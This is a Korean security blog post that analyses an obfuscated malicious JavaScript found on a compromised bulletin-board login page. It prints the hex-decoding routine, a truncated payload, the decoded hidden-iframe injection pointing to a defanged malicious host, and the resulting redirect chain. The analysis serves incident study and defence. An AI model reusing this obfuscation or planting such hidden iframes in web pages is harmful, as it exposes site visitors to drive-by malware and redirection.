
security/악성코드 유포

[JS/Obfuscated.HN] hxxp://insaweb9.cafe24.com/bbs/login.php?id=best 악성 스크립트 유포 정리 !


[악성 스크립트]


 function c102916999516m4943389011261(m4943389011648)

 {

   function m4943389011a31()

   {

     var m4943389011e19=16;

     return m4943389011e19;

   }

   return (parseInt(m4943389011648,m4943389011a31()));

 }

 function m49433890125ea(m49433890129d2)

 {

   var m4943389013589=2;

   var m4943389012dba='';

   m4943389014143=String.fromCharCode;

   for(m49433890131a2=0;m49433890131a2<m49433890129d2.length;m49433890131a2+=m4943389013589)

   {

     m4943389012dba+=(m4943389014143(c102916999516m4943389011261(m49433890129d2.substr(m49433890131a2,m4943389013589))));

   }

   return m4943389012dba;

 }

 // Analyst note: z89 is an empty string, so every '+z89+' below concatenates
 // nothing. The splitting only chops the hex payload into fragments
 // (presumably to hinder simple string/signature matching; not confirmed here).
 var z89='';

 // Hex-encoded payload. Joined, the visible prefix is
 // 3C7363726970743E696628216D79696129..., which decodes to "<script>if(!myia)"
 // and matches the decoded output shown further down the page.
 // "[중략]" ("omitted") is the blog author's truncation marker, not part of the
 // sample; as printed, this line is incomplete and will not parse.
 var m4943389014917='3C7'+z89+'3637'+z89+'2697'+z89+'07'+z89+'43E696628216D7'+z89+'96961297'+z8[중략]';

// Sink: the decoded string is handed to document.write, so any markup or
// script it contains is parsed by the browser that loads the page. When
// triaging a sample like this, decode the hex offline or print the string
// instead of writing it into a document, and do so only in an isolated
// analysis environment.
document.write(m49433890125ea(m4943389014917))


[디코딩] (1차: 16진수 문자열을 문자로 복원한 결과)


---------------------------

웹 페이지의 메시지

---------------------------

<script>if(!myia){document.write(unescape( '%3c%69%66%72%61[중략]%65%3e'));}var myia=true;</script>

---------------------------

확인   

---------------------------


[HEX 디코딩] (2차: unescape로 %xx 퍼센트 인코딩 문자열을 복원한 결과)


<script>if(!myia){document.write(unescape( '<iframe name=c10 src='hXXp://gogo2me.net/.go/check.html?'+Math.round(Math.random()*441780)+'53ebedca2' width=796 height=555 style='display: none'></iframe>'));}var myia=true;</script>


[링크 정리]


최초 페이지 : hxxp://insaweb9.cafe24.com/bbs/login.php?id=best

iframe 연결 : hxxp://gogo2me.net/.go/check.html?

frame 연결 : hxxp://ww1.gogo2me.net

최종 연결 : hxxp://dsparking.com/?epl=BuMcp4amXBdAWsCMnIJ0Z4C2x48RJBROkdzFv8QqzkJ4Ay1CXlxfQ6mi61vN0pPAoOmoXXBgdmlh6Kicts9kZcc0IhH9Vq6Gtobv5oNuGaFAFOK6wEvwlRCIYioJpGfY9zPLjIhnGiFIJ2eWQ8ruVVzYpcOFgqBaZ5r975LUC4SpplPK4OQBu9zgFyDHBgMK6glEw1kwqCot4FuQc67dqY1xmsphQpFN5T73rcKLa0f5wXH3m1H-yQ4BxYYmEkVIc9ocXX2MFxjYFlmSTLGs7d863edJt4Xr6E7PcBlwb6z67kPP1cfgtBAuo-KlChGDjZMx9m2rLj97RSSSkjTj43wKfbaH8Uq-DD3UrmIZKAjSGDqjUueK1pbNkCdH-B2oSs5TQl45ngI8oFxUs-WJXFoTnCn8MPuS4TAaUI8GqAcyDQDUo5Ge9FBPmZ7aFE9FAIB6IKMB6dGoJz31QKb6SU95oMmUpyKUUT-lR6ZN9YNGeoIpHo1qTzUNPfVTI9J7qpn0VNEsLQEw8P__v_D__7_y_wMAAECAXw8AANoeP0ZZUyZZQTE2aFpClAEAAPA


hxxp://ww1.gogo2me.net?epl=Up_MRQiLp0w607k_C8ICdwDLC8kfEgqnSO7iRrI_BtcJeODFzQ-jZnaN67qWUo1O8zsWeCBxWS_adJTTtpsoiD55i0SVyKgwITinR5GwBulQgTiGXwppNtIRtmLj3tJv_BrvV0IQN0L51Aoyhr_9YAK-E115DY09ZgVSM6499eXEPnyiMn7DYN0SZ9c8WImC3STQbi3pe1VjdwCL8Uo6CvfV6xFjJk0-ETP50EiGwQKsRgWbySVlcjpwttDVpv7seO49LtPh9oBcg3M9ihhVJTVe3XBLfe9ShwhI4V4UxTHu-Z_kOUxbmI2ytetLI1t-o412qJYgmGFxsZ1TBHKDd4fAIGQxWQxYbXBhxtJ1uU07PxomPJgwqWydab3L8vO8AxC-sCxlMmKaaUoPU5t6apjQJrUR06b01KaYplH_VAU01KapBzSNpiGASU8w0UzANE2mIgaaJhMAAKYJEyYAE2DCHBMWATDw__-_8P__v_L_AwAAQIDfDAAAWF5I_llTJllBMTZoWkJqAQAA8A


최종 연결지는 현재(작성 시점 기준) 접속이 안 되고 있습니다!

=========================
Server IP(s):
0.0.0.0
=========================